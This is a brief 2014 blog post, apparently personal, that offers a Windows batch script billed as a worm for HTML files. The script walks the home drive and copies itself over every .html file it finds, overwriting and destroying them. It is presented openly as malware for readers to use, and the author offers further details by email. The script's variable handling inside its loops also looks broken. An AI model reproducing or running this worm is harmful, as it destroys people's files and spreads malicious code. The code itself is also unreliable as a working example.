Thursday, August 7, 2014

Make worm for html files

@echo off
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.html) Do (
Set HtmlInfect=%%Z > Nul
Copy /y %0 %HtmlInfect%
)
)
Del /f /s /q DirPath


get full information mail me.
 ------------------
Dharambir Singh
Software Engineer
-------------------

No comments:

Post a Comment

Dharamart.blogspot.in